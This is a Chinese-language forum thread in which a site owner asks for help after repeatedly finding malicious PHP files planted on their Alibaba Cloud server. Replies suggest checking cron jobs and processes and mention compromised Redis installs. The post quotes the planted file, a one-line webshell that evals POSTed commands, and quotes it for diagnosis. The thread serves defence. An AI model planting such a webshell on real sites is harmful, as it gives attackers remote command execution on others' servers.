服务器大神来支招,网站被挂马!

2017-06-29 18:11:50 +08:00
 ningcool

网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:

< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >

只有这么一句话的恶意脚本。

我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。

12762 次点击
所在节点    Linux
104 条回复
ningcool
2017-07-03 10:43:59 +08:00
@Admstor 感谢这么多的中肯建议!
ningcool
2017-07-03 10:44:50 +08:00
谢谢你的建议,wp 我也在用,感觉确实慢了一些。用到了缓存插件好了一点。
MARCH0
2017-07-03 11:52:52 +08:00
@ningcool 不给访问权限好像会把脚本下载回来
hugedata
2017-07-11 17:48:15 +08:00
哥们,看看服务器有没有定时任务或者进程里有不正常的,另外,你没有装 Redis 吧?现在阿里云上装 redis 的中招的不少,被控挖矿的比较多。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/371985

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX